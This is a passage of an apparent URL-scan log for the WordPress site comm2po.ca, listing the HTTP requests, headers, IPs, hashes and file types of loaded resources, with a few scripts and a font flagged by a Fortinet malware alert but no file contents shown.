Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 30 Jul 2020 07:04:10 GMT
etag: "15410d5-1a21d-5aba3476e8e80-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 25214
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4
72.167.59.18200 OK 32 kB URL HTTP/2 www.comm2po.ca/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Unicode text, UTF-8 text, with very long lines (34747), with NEL line terminators
Hash 21533efa45f62a5ab82242db0546d667
371a0d946d6a3cc00de832c7d57f7482d845bac6
3e924fada8f050a627bf232ac340977dd31fd4bd4f26eccae483b71221f25c52
Analyzer Verdict Alert fortinet Malware
GET /wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=7.4.4 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 19 Sep 2019 15:19:18 GMT
etag: "1581260-1833d-592e97a278980-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 32431
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash c683e61e63df92799aa274fdac42cd3b
191aeec95861fa8596a90a10c60b22434431c033
898c007bc0e7d5f4d3180c9fe28b88036102ba64912d0773c023e1f4f07d7beb
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash c683e61e63df92799aa274fdac42cd3b
191aeec95861fa8596a90a10c60b22434431c033
898c007bc0e7d5f4d3180c9fe28b88036102ba64912d0773c023e1f4f07d7beb
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
fonts.gstatic.com/s/raleway/v28/1Ptug8zYS_SKggPNyC0ITw.woff2
142.250.74.163200 OK 46 kB URL HTTP/2 fonts.gstatic.com/s/raleway/v28/1Ptug8zYS_SKggPNyC0ITw.woff2
IP 142.250.74.163:0
File type Web Open Font Format (Version 2), TrueType, length 46524, version 1.0\012- data
Hash c1fd378f54921c75e4ae1821e7b8fff6
2ce96e97783b2f154d07f4464ca6f8eb2469f2c1
405ceee1c2f5c31f1cb94ebc63d49a43fddd1471c2c7401a01c7c11bb1d93826
GET /s/raleway/v28/1Ptug8zYS_SKggPNyC0ITw.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 46524
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Mon, 19 Sep 2022 21:13:12 GMT
expires: Tue, 19 Sep 2023 21:13:12 GMT
cache-control: public, max-age=31536000
age: 112228
last-modified: Mon, 18 Jul 2022 19:58:01 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash c683e61e63df92799aa274fdac42cd3b
191aeec95861fa8596a90a10c60b22434431c033
898c007bc0e7d5f4d3180c9fe28b88036102ba64912d0773c023e1f4f07d7beb
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css
104.17.25.14200 OK 3.5 kB URL HTTP/2 cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.2/animate.min.css
IP 104.17.25.14:0
File type ASCII text, with very long lines (57919)
Hash 4a8baa45fecbff51b8b9863b95788c9f
1dbc7f159b53fbd717d8cff486a39373d09aecfc
3a9ca2c9d6a36ce0283f1bc2502912ffb17c2acf9421d3b0ffd81a6be92b63af
GET /ajax/libs/animate.css/3.7.2/animate.min.css HTTP/1.1
Host: cdnjs.cloudflare.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-type: text/css; charset=utf-8
content-length: 3511
access-control-allow-origin: *
cache-control: public, max-age=30672000
content-encoding: br
etag: "5eb03d2a-e311"
last-modified: Mon, 04 May 2020 16:04:58 GMT
cf-cdnjs-via: cfworker/kv
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
x-content-type-options: nosniff
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
vary: Accept-Encoding
cf-cache-status: HIT
age: 9183701
expires: Mon, 11 Sep 2023 04:23:40 GMT
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5HwnUpInwR2DhkQN3NtEdmmnJFsDy6zUrQcG1TsE%2FFD4fxJXwOd5%2BaTXWaiI9AkG9x%2Bu8lar4RJkP6kDbOmShU4MUsQHQlZ3w2KcwG6Gzn%2FUf92Q1Mh807oZaqUzIVZMZauzaWen"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=15780000
server: cloudflare
cf-ray: 74e006ddcead0b31-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/js/plugins.js?ver=1
72.167.59.18200 OK 76 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/js/plugins.js?ver=1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type HTML document, ASCII text, with very long lines (20791), with CRLF line terminators
Hash e20c81ef266ab941bb6068cfb6eef535
c1568a7b98393a214ffee0eeccfc485808f250d1
508524393350975e2347fb0494e712083b7639a7b017eb2d05dcb02540471fce
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/js/plugins.js?ver=1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "13216e0-485c7-552f9031b2c00-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 75535
content-type: application/javascript
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/web_design-300x282.png
72.167.59.18200 OK 22 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/web_design-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash e22e46256648813012bb63a53ffd9bb9
4bf8fb06daa2eebaf3afa3384e0291e520e568e0
a1f7ca80fbd0abfd98b8d14637d4935b445a9315ee313f29051882c2ebac2409
GET /wp-content/uploads/2019/02/web_design-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 18:53:09 GMT
etag: "1580beb-550e-5812a1ece4f40"
accept-ranges: bytes
content-length: 21774
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/media_placement-300x282.png
72.167.59.18200 OK 22 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/media_placement-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash 9f2b0fc228604379500263f62690a174
f9e62b173946a365178666ca604660dff2e74fed
608271e9a436922120de35c5b298bd9d2bcb7ecbfa9af82f4cc1e40165b0db75
GET /wp-content/uploads/2019/02/media_placement-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:36:03 GMT
etag: "1580bd2-552f-5812ab83a6ec0"
accept-ranges: bytes
content-length: 21807
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
code.jquery.com/jquery-3.3.1.min.js
69.16.175.42200 OK 30 kB URL HTTP/2 code.jquery.com/jquery-3.3.1.min.js
IP 69.16.175.42:0
File type ASCII text, with very long lines (65451)
Hash d549b312f7a7d228b4ec229a6547dfdc
0766794582ad530ec0f8c2595f741086afffa312
f6488b2915e0ceee723f4320492511d46c6ba1860d5975d085e6da8913f55f44
GET /jquery-3.3.1.min.js HTTP/1.1
Host: code.jquery.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-encoding: gzip
content-length: 30288
content-type: application/javascript; charset=utf-8
last-modified: Fri, 20 Aug 2021 17:47:53 GMT
accept-ranges: bytes
server: nginx
etag: W/"611feac9-1538f"
cache-control: max-age=315360000, public
access-control-allow-origin: *
vary: Accept-Encoding
x-hw: 1663734220.dop216.sk1.t,1663734220.cds261.sk1.hn,1663734220.cds072.sk1.c
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/web_referencing-300x283.png
72.167.59.18200 OK 26 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/web_referencing-300x283.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 283, 8-bit/color RGBA, non-interlaced\012- data
Hash 9af9167740170aab2bd9bd2a2f88633a
07444bb8a7c54c1a0cbd7ac75c20f855d1cfdbb4
126b0d0a5105a9d76147542db390b42addc3c38b2ef4e28ce754f1dabd15c88c
GET /wp-content/uploads/2019/02/web_referencing-300x283.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:07:52 GMT
etag: "1580bf0-66f6-5812a536fd200"
accept-ranges: bytes
content-length: 26358
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/social_media-300x283.png
72.167.59.18200 OK 27 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/social_media-300x283.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 283, 8-bit/color RGBA, non-interlaced\012- data
Hash 767c584be252ecc6408d0925e7461679
2bc06cbdf9b58478d9894239414bc8b83ea245ed
61e2d035740871219e9211d97cd8c1c9a6feefe7874494cc8b7a105b72fe63a3
GET /wp-content/uploads/2019/02/social_media-300x283.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:11:56 GMT
etag: "1580bd7-6a6d-5812a61faf700"
accept-ranges: bytes
content-length: 27245
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/tailored_marketing-300x282.png
72.167.59.18200 OK 28 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/tailored_marketing-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash 053988bf539dda80eb551fa6a4c9a466
2dba30ce57756eef71f3565089710d1815baae9a
95f1268026dc782f7bfa6366ee3e4ea1f2f76e1627a2d5fded0068a76a7a694b
GET /wp-content/uploads/2019/02/tailored_marketing-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:13:56 GMT
etag: "1580bdc-6f3b-5812a69220500"
accept-ranges: bytes
content-length: 28475
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2019/02/content_marketing-300x282.png
72.167.59.18200 OK 29 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2019/02/content_marketing-300x282.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 300 x 282, 8-bit/color RGBA, non-interlaced\012- data
Hash 55b0a290f38f612b8b7e868a6ac3833c
86f26b8913388f4a619c4cbc0104ddec06911c45
52af0daa0574b01c993d7bd0fd73b0f3100299257ce5935f2d091fd78a8ea6f0
GET /wp-content/uploads/2019/02/content_marketing-300x282.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 05 Feb 2019 19:34:06 GMT
etag: "1580bc7-6fa2-5812ab1412780"
accept-ranges: bytes
content-length: 28578
content-type: image/png
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/05/tcc-canada-513x401.jpg
72.167.59.18200 OK 41 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/05/tcc-canada-513x401.jpg
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 513x401, components 3\012- data
Hash 899e22b7e8367b307b1644eb63877c0f
e167d9881213b66e60d717893a009a4536706668
ed778febe3f4710c387f5bf8e4fdcd49e092bd1985d23d47cc1428d0f5dc306e
GET /wp-content/uploads/2021/05/tcc-canada-513x401.jpg HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 05 May 2021 14:42:35 GMT
etag: "1580e37-a0b3-5c19634952cc0"
accept-ranges: bytes
content-length: 41139
content-type: image/jpeg
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
cdn.polyfill.io/v2/polyfill.js?features=es5,es6,es2016,es2017,MutationObserver|gated&flags=gated&unknown=polyfill
151.101.85.26200 OK 960 B URL HTTP/2 cdn.polyfill.io/v2/polyfill.js?features=es5,es6,es2016,es2017,MutationObserver|gated&flags=gated&unknown=polyfill
IP 151.101.85.26:0
File type ASCII text, with very long lines (3850)
Hash 5393d67797de9c9a89dad759ee65998d
fd875584a5f9a2ec7dc6550f62fa22934d3bd061
70556f7b92f7b7f9ab59034de485a62a6e5ea1b73f4720b6f406e98c8d24b95b
GET /v2/polyfill.js?features=es5,es6,es2016,es2017,MutationObserver|gated&flags=gated&unknown=polyfill HTTP/1.1
Host: cdn.polyfill.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
access-control-allow-origin: *
access-control-allow-methods: GET,HEAD,OPTIONS
cache-control: public, s-maxage=31536000, max-age=604800, stale-while-revalidate=604800, stale-if-error=604800
content-type: text/javascript; charset=utf-8
last-modified: Wed, 14 Sep 2022 15:11:15 GMT
content-encoding: br
age: 0
accept-ranges: bytes
useragent_normaliser: firefox/96.0.0
date: Wed, 21 Sep 2022 04:23:40 GMT
vary: User-Agent, Accept-Encoding
server-timing: cache-bma1657, PASS, fastly;desc="Edge time";dur=12
content-length: 960
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 596ea0e7cffcb12819c214fd7e55e6b5
fdf581b35743d7693bf8c7f6154471a1b2646f06
a78eee2be3725b096407fde832e7762dad74ac69165f57a10b1ef76b5b2d9874
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
app.leadfox.co/css/leadfox.css
172.67.71.4200 OK 43 kB URL HTTP/2 app.leadfox.co/css/leadfox.css
IP 172.67.71.4:0
Hash e6abc2faceaee6b31d9d9f6348ded7ff
9204b76a62b46fd56b56972a4d1b5dcdc46fd457
42a54cdea29116d8d1e6b8618caf0abba9fc5dc2a732a1c29627857681195c5e
GET /css/leadfox.css HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:40 GMT
content-type: text/css
last-modified: Tue, 20 Sep 2022 17:43:13 GMT
etag: W/"491-5e91f5cc18e40-gzip"
vary: Accept-Encoding
access-control-allow-origin:
x-kong-upstream-latency: 1
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=excdcjPp%2Fpn0LH9ne3grlGtflf7ddunCrZPPt4%2BJ7zK2OZ7g%2FzDn4cWT4BkcbMNwDWuMLZJCsrlXu8Q9ICNzpp8Q%2FdFabdhIfPOhg%2F34DlqwWUhZQ4Zf5e5fVdTYxgFv"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006de8ab4b4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash 596ea0e7cffcb12819c214fd7e55e6b5
fdf581b35743d7693bf8c7f6154471a1b2646f06
a78eee2be3725b096407fde832e7762dad74ac69165f57a10b1ef76b5b2d9874
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:40 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.5.0
72.167.59.18200 OK 67 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.5.0
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Web Open Font Format (Version 2), TrueType, length 66624, version 4.262\012- data
Hash db812d8a70a4e88e888744c1c9a27e89
638c652d623280a58144f93e7b552c66d1667a11
ff82aeed6b9bb6701696c84d1b223d2e682eb78c89117a438ce6cfea8c498995
GET /wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fonts/fontawesome-webfont.woff2?v=4.5.0 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://www.comm2po.ca/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css/font-awesome.min.css?ver=4.12
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Fri, 05 Feb 2016 10:58:14 GMT
etag: "156037b-10440-52b03ba4c1d80"
accept-ranges: bytes
content-length: 66624
vary: Accept-Encoding
content-type: font/woff2
date: Wed, 21 Sep 2022 04:23:40 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/themes/prodigy/assets/fonts/et-line.woff
72.167.59.18200 OK 55 kB URL HTTP/2 www.comm2po.ca/wp-content/themes/prodigy/assets/fonts/et-line.woff
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type Web Open Font Format, CFF, length 55220, version 1.0\012- data
Hash b01ff252761958325faab1535c90c87f
d33413e7bc42acc8837cc9030ca45d29c1ccf0c6
19d2f43d546ada73dd083f7778aa4a5cac1a8e7a3af56efccae580fce07a5e1c
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/prodigy/assets/fonts/et-line.woff HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://www.comm2po.ca/wp-content/themes/prodigy/assets/css/et-line.css?ver=1.0
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 27 Jun 2017 22:58:56 GMT
etag: "12e1d15-d7b4-552f9031b2c00"
accept-ranges: bytes
content-length: 55220
vary: Accept-Encoding
content-type: font/woff
date: Wed, 21 Sep 2022 04:23:40 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-1-513x401.png
72.167.59.18200 OK 228 kB URL HTTP/2 www.comm2po.ca/wp-content/uploads/2021/04/Lyticainc-1-513x401.png
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type PNG image data, 513 x 401, 8-bit/color RGBA, non-interlaced\012- data
Size 228 kB (227888 bytes)
Hash 9cde152a6750ad15b7d509cf7e2be2fa
3dd36be6f2c3394066d24c9841ade0a19c1dcab5
fad01e74d3003c5df6aa9561bd7046ef8696f8ead4aed6cec1cc4d84612d7741
GET /wp-content/uploads/2021/04/Lyticainc-1-513x401.png HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:31:13 GMT
etag: "1580d66-37a30-5c17053fada40"
accept-ranges: bytes
